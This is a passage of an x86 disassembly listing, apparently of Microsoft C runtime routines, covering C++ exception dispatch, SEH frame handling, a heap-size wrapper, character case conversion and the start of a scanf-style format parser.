; ---------------------------------------------------------------------------
loc_414FA8: ; CODE XREF: sub_414E41+D6�j
cmp [ebp+arg_14], 0
jz short loc_414FB8
push 1
push esi
call sub_415516
pop ecx
pop ecx
loc_414FB8: ; CODE XREF: sub_414E41+56�j
; sub_414E41+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414FBD: ; CODE XREF: sub_414E41+37�j
; sub_414E41+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_414FE3
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_414FE8
add esp, 20h
jmp short loc_414FB8
; ---------------------------------------------------------------------------
loc_414FE3: ; CODE XREF: sub_414E41+180�j
jmp sub_4155EC
sub_414E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414FE8 proc near ; CODE XREF: sub_414E41+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_45F8BC, 0
push esi
push edi
jz short loc_415019
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41100A
add esp, 1Ch
test eax, eax
jnz short loc_41508C
loc_415019: ; CODE XREF: sub_414FE8+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_411133
add esp, 14h
mov esi, eax
loc_415035: ; CODE XREF: sub_414FE8+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41508C
cmp edi, [esi]
jl short loc_415084
cmp edi, [esi+4]
jg short loc_415084
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41505E
cmp byte ptr [ecx+8], 0
jnz short loc_415084
loc_41505E: ; CODE XREF: sub_414FE8+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4151A1
add esp, 2Ch
loc_415084: ; CODE XREF: sub_414FE8+57�j
; sub_414FE8+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_415035
; ---------------------------------------------------------------------------
loc_41508C: ; CODE XREF: sub_414FE8+2F�j
; sub_414FE8+53�j
pop edi
pop esi
leave
retn
sub_414FE8 endp
; =============== S U B R O U T I N E =======================================
sub_415090 proc near ; CODE XREF: sub_414E41+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_4150E7
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_4150E7
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_4150C1
add ecx, 8
push ecx
push edx
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4150E3
loc_4150C1: ; CODE XREF: sub_415090+1F�j
test byte ptr [esi], 2
jz short loc_4150CB
test byte ptr [edi], 8
jz short loc_4150E3
loc_4150CB: ; CODE XREF: sub_415090+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_4150DA
test byte ptr [edi], 1
jz short loc_4150E3
loc_4150DA: ; CODE XREF: sub_415090+43�j
test al, 2
jz short loc_4150E7
test byte ptr [edi], 2
jnz short loc_4150E7
loc_4150E3: ; CODE XREF: sub_415090+2F�j
; sub_415090+39�j ...
xor eax, eax
jmp short loc_4150EA
; ---------------------------------------------------------------------------
loc_4150E7: ; CODE XREF: sub_415090+B�j
; sub_415090+14�j ...
push 1
pop eax
loc_4150EA: ; CODE XREF: sub_415090+55�j
pop edi
pop esi
retn
sub_415090 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4150ED proc near ; CODE XREF: sub_414DA6+34�p
; sub_4151A1+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C7D8
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41511F: ; CODE XREF: sub_4150ED+8A�j
cmp esi, [ebp+arg_C]
jz short loc_415179
cmp esi, 0FFFFFFFFh
jle short loc_41512E
cmp esi, [edi+4]
jl short loc_415133
loc_41512E: ; CODE XREF: sub_4150ED+3A�j
call sub_415642
loc_415133: ; CODE XREF: sub_4150ED+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41514E
push 103h
push ebx
push eax
call sub_4155A0
loc_41514E: ; CODE XREF: sub_4150ED+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41516E
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41518B
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41516E: ; CODE XREF: sub_4150ED+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41511F
; ---------------------------------------------------------------------------
loc_415179: ; CODE XREF: sub_4150ED+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4150ED endp
; =============== S U B R O U T I N E =======================================
sub_41518B proc near ; CODE XREF: sub_4150ED+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41519C
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41519C: ; CODE XREF: sub_41518B+C�j
jmp sub_4155EC
sub_41518B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4151A1 proc near ; CODE XREF: sub_414E41+151�p
; sub_414FE8+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_4151C3
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_415352
add esp, 10h
loc_4151C3: ; CODE XREF: sub_4151A1+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_4151CF
push edi
jmp short loc_4151D2
; ---------------------------------------------------------------------------
loc_4151CF: ; CODE XREF: sub_4151A1+29�j
push [ebp+arg_24]
loc_4151D2: ; CODE XREF: sub_4151A1+2C�j
call sub_410F0C
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_4150ED
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41521C
add esp, 2Ch
test eax, eax
jz short loc_415217
push edi
push eax
call sub_410ECA
loc_415217: ; CODE XREF: sub_4151A1+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4151A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41521C proc near ; CODE XREF: sub_4151A1+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C7E8
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, ds:dword_45F8B4
mov [ebp+var_1C], ecx
mov ecx, ds:dword_45F8B8
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov ds:dword_45F8B4, edi
mov ecx, [ebp+arg_8]
mov ds:dword_45F8B8, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_410F91
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_4152E2
mov eax, [ebp+var_2C]
loc_4152A9: ; CODE XREF: seg000:004152D8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41521C endp
; =============== S U B R O U T I N E =======================================
sub_4152B8 proc near ; DATA XREF: seg001:0041C7F8�o
push dword ptr [ebp-14h]
call sub_415328
pop ecx
retn
sub_4152B8 endp
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_4111F2
pop ecx
pop ecx
xor eax, eax
jmp short loc_4152A9
; ---------------------------------------------------------------------------
loc_4152DA: ; DATA XREF: seg001:0041C7F0�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_4152E2 proc near ; CODE XREF: sub_41521C+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov ds:dword_45F8B4, eax
mov eax, [ebp-20h]
mov ds:dword_45F8B8, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_415327
cmp dword ptr [edi+10h], 3
jnz short locret_415327
cmp dword ptr [edi+14h], 19930520h
jnz short locret_415327
cmp [ebp-24h], ebx
jnz short locret_415327
cmp [ebp-2Ch], ebx
jz short locret_415327
call sub_41125A
push eax
push edi
call sub_415516
pop ecx
pop ecx
locret_415327: ; CODE XREF: sub_4152E2+1C�j
; sub_4152E2+22�j ...
retn
sub_4152E2 endp
; =============== S U B R O U T I N E =======================================
sub_415328 proc near ; CODE XREF: sub_4152B8+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41534F
cmp dword ptr [eax+10h], 3
jnz short loc_41534F
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41534F
cmp dword ptr [eax+1Ch], 0
jnz short loc_41534F
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41534F: ; CODE XREF: sub_415328+C�j
; sub_415328+12�j ...
xor eax, eax
retn
sub_415328 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415352 proc near ; CODE XREF: sub_4151A1+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C800
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_4154FB
cmp byte ptr [eax+8], 0
jz loc_4154FB
mov eax, [ecx+8]
test eax, eax
jz loc_4154FB
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_4153EF
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_418980
pop ecx
pop ecx
test eax, eax
jz loc_4154F2
push 1
push edi
call sub_41899C
pop ecx
pop ecx
test eax, eax
jz loc_4154F2
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_4153E0: ; CODE XREF: sub_415352+F5�j
push eax
call sub_41557D
pop ecx
pop ecx
mov [edi], eax
jmp loc_4154F7
; ---------------------------------------------------------------------------
loc_4153EF: ; CODE XREF: sub_415352+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_415449
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_418980
pop ecx
pop ecx
test eax, eax
jz loc_4154F2
push 1
push edi
call sub_41899C
pop ecx
pop ecx
test eax, eax
jz loc_4154F2
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_4112D0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_4154F7
mov eax, [edi]
test eax, eax
jz loc_4154F7
add esi, 8
push esi
jmp short loc_4153E0
; ---------------------------------------------------------------------------
loc_415449: ; CODE XREF: sub_415352+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_415491
call sub_418980
pop ecx
pop ecx
test eax, eax
jz loc_4154F2
push 1
push edi
call sub_41899C
pop ecx
pop ecx
test eax, eax
jz short loc_4154F2
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41557D
pop ecx
pop ecx
push eax
push edi
call sub_4112D0
add esp, 0Ch
jmp short loc_4154F7
; ---------------------------------------------------------------------------
loc_415491: ; CODE XREF: sub_415352+103�j
call sub_418980
pop ecx
pop ecx
test eax, eax
jz short loc_4154F2
push 1
push edi
call sub_41899C
pop ecx
pop ecx
test eax, eax
jz short loc_4154F2
push dword ptr [esi+18h]
call sub_4189B8
pop ecx
test eax, eax
jz short loc_4154F2
test byte ptr [esi], 4
jz short loc_4154D8
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41557D
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_410F05
jmp short loc_4154F7
; ---------------------------------------------------------------------------
loc_4154D8: ; CODE XREF: sub_415352+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41557D
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_410EFE
jmp short loc_4154F7
; ---------------------------------------------------------------------------
loc_4154F2: ; CODE XREF: sub_415352+6A�j
; sub_415352+7C�j ...
call sub_415642
loc_4154F7: ; CODE XREF: sub_415352+98�j
; sub_415352+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_4154FB: ; CODE XREF: sub_415352+2E�j
; sub_415352+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_415352 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_4155EC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415516 proc near ; CODE XREF: sub_414E41+170�p
; sub_4152E2+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C810
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41555D
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41555D
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_410EFE
or [ebp+var_4], 0FFFFFFFFh
loc_41555D: ; CODE XREF: sub_415516+2A�j
; sub_415516+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_415516 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_4155EC
; =============== S U B R O U T I N E =======================================
sub_41557D proc near ; CODE XREF: sub_415352+8F�p
; sub_415352+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41559E
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41559E: ; CODE XREF: sub_41557D+12�j
pop esi
retn
sub_41557D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155A0 proc near ; CODE XREF: sub_410F91+40�p
; sub_4150ED+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41127D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_4155DF
mov ecx, 2
loc_4155DF: ; CODE XREF: sub_4155A0+38�j
push ecx
call sub_41127D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_4155A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155EC proc near ; CODE XREF: sub_414E41:loc_414FE3�j
; sub_41518B:loc_41519C�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004189D0 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C820
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_45F8C0
test eax, eax
jz short loc_415634
mov [ebp+var_4], 1
call eax
jmp short loc_415630
; ---------------------------------------------------------------------------
loc_415629: ; DATA XREF: seg001:0041C830�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41562D: ; DATA XREF: seg001:0041C834�o
mov esp, [ebp+var_18]
loc_415630: ; CODE XREF: sub_4155EC+3B�j
and [ebp+var_4], 0
loc_415634: ; CODE XREF: sub_4155EC+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41563D: ; DATA XREF: seg001:0041C828�o
jmp loc_4189D0
sub_4155EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415642 proc near ; CODE XREF: sub_411133+23�p
; sub_411133:loc_41119E�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C838
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_42E4F4
test eax, eax
jz short loc_41568A
mov [ebp+var_4], 1
call eax
jmp short loc_415686
; ---------------------------------------------------------------------------
loc_41567F: ; DATA XREF: seg001:0041C848�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_415683: ; DATA XREF: seg001:0041C84C�o
mov esp, [ebp+var_18]
loc_415686: ; CODE XREF: sub_415642+3B�j
and [ebp+var_4], 0
loc_41568A: ; CODE XREF: sub_415642+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_415693: ; DATA XREF: seg001:0041C840�o
jmp sub_4155EC
sub_415642 endp
; =============== S U B R O U T I N E =======================================
sub_415698 proc near ; CODE XREF: sub_411613+7�p
; sub_411613+26�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_413550
test eax, eax
pop ecx
jz short loc_4156B0
mov eax, [esi-4]
pop esi
sub eax, 9
retn
; ---------------------------------------------------------------------------
loc_4156B0: ; CODE XREF: sub_415698+E�j
push esi
push 0
push ds:dword_460EA0
call ds:dword_41C170 ; RtlSizeHeap
pop esi
retn
sub_415698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156C1 proc near ; CODE XREF: sub_4116C1+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_45F8D0, 0
push ebx
jnz short loc_4156EC
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41578A
cmp eax, 7Ah
jg loc_41578A
sub eax, 20h
jmp loc_41578A
; ---------------------------------------------------------------------------
loc_4156EC: ; CODE XREF: sub_4156C1+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41571F
cmp ds:dword_42E39C, 1
jle short loc_41570C
push 2
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415717
; ---------------------------------------------------------------------------
loc_41570C: ; CODE XREF: sub_4156C1+3D�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 2
loc_415717: ; CODE XREF: sub_4156C1+49�j
test eax, eax
jnz short loc_41571F
loc_41571B: ; CODE XREF: sub_4156C1+AF�j
mov eax, ebx
jmp short loc_41578A
; ---------------------------------------------------------------------------
loc_41571F: ; CODE XREF: sub_4156C1+34�j
; sub_4156C1+58�j
mov edx, ds:dword_42E190
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_415742
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41574B
; ---------------------------------------------------------------------------
loc_415742: ; CODE XREF: sub_4156C1+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41574B: ; CODE XREF: sub_4156C1+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push ds:dword_45F8D0
call loc_416B94
add esp, 20h
test eax, eax
jz short loc_41571B
cmp eax, 1
jnz short loc_41577D
movzx eax, [ebp+var_4]
jmp short loc_41578A
; ---------------------------------------------------------------------------
loc_41577D: ; CODE XREF: sub_4156C1+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41578A: ; CODE XREF: sub_4156C1+14�j
; sub_4156C1+1D�j ...
pop ebx
leave
retn
sub_4156C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41578D proc near ; CODE XREF: sub_4118E0+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_416193
mov edi, [ebp+arg_0]
jmp short loc_4157BC
; ---------------------------------------------------------------------------
loc_4157B7: ; CODE XREF: sub_41578D+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_4157BC: ; CODE XREF: sub_41578D+28�j
cmp ds:dword_42E39C, 1
jle short loc_4157D4
movzx eax, al
push 8
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_4157E3
; ---------------------------------------------------------------------------
loc_4157D4: ; CODE XREF: sub_41578D+36�j
mov ecx, ds:dword_42E190
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_4157E3: ; CODE XREF: sub_41578D+45�j
cmp eax, ebx
jz short loc_41581D
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41621A
pop ecx
pop ecx
push eax
call sub_416203
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_418AAF
add esp, 0Ch
loc_41580B: ; CODE XREF: sub_41578D+8E�j
test eax, eax
jz short loc_41581D
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_418AAF
pop ecx
jmp short loc_41580B
; ---------------------------------------------------------------------------
loc_41581D: ; CODE XREF: sub_41578D+58�j
; sub_41578D+80�j
cmp byte ptr [esi], 25h
jnz loc_4160FF
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_415854: ; CODE XREF: sub_41578D+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp ds:dword_42E39C, 1
jle short loc_415871
movzx eax, bl
push 4
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_415880
; ---------------------------------------------------------------------------
loc_415871: ; CODE XREF: sub_41578D+D3�j
mov ecx, ds:dword_42E190
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_415880: ; CODE XREF: sub_41578D+E2�j
test eax, eax
jz short loc_415896
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_415896: ; CODE XREF: sub_41578D+F5�j
cmp ebx, 4Eh
jg short loc_4158D9
jz short loc_4158FB
cmp ebx, 2Ah
jz short loc_4158D4
cmp ebx, 46h
jz short loc_4158FB
cmp ebx, 49h
jz short loc_4158B6
cmp ebx, 4Ch
jnz short loc_4158E8
inc [ebp+var_D]
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_4158B6: ; CODE XREF: sub_41578D+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_4158E8
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_4158E8
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_4158D4: ; CODE XREF: sub_41578D+113�j
inc [ebp+var_E]
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_4158D9: ; CODE XREF: sub_41578D+10C�j
cmp ebx, 68h
jz short loc_4158F5
cmp ebx, 6Ch
jz short loc_4158ED
cmp ebx, 77h
jz short loc_4158F0
loc_4158E8: ; CODE XREF: sub_41578D+122�j
; sub_41578D+12D�j ...
inc [ebp+var_F]
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_4158ED: ; CODE XREF: sub_41578D+154�j
inc [ebp+var_D]
loc_4158F0: ; CODE XREF: sub_41578D+159�j
inc [ebp+var_5]
jmp short loc_4158FB
; ---------------------------------------------------------------------------
loc_4158F5: ; CODE XREF: sub_41578D+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_4158FB: ; CODE XREF: sub_41578D+107�j
; sub_41578D+10E�j ...
cmp [ebp+var_F], 0
jz loc_415854
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_415920
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_415920: ; CODE XREF: sub_41578D+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41593E
mov al, [esi]
cmp al, 53h
jz short loc_41593A
cmp al, 43h
jz short loc_41593A
or [ebp+var_5], 0FFh
jmp short loc_41593E
; ---------------------------------------------------------------------------
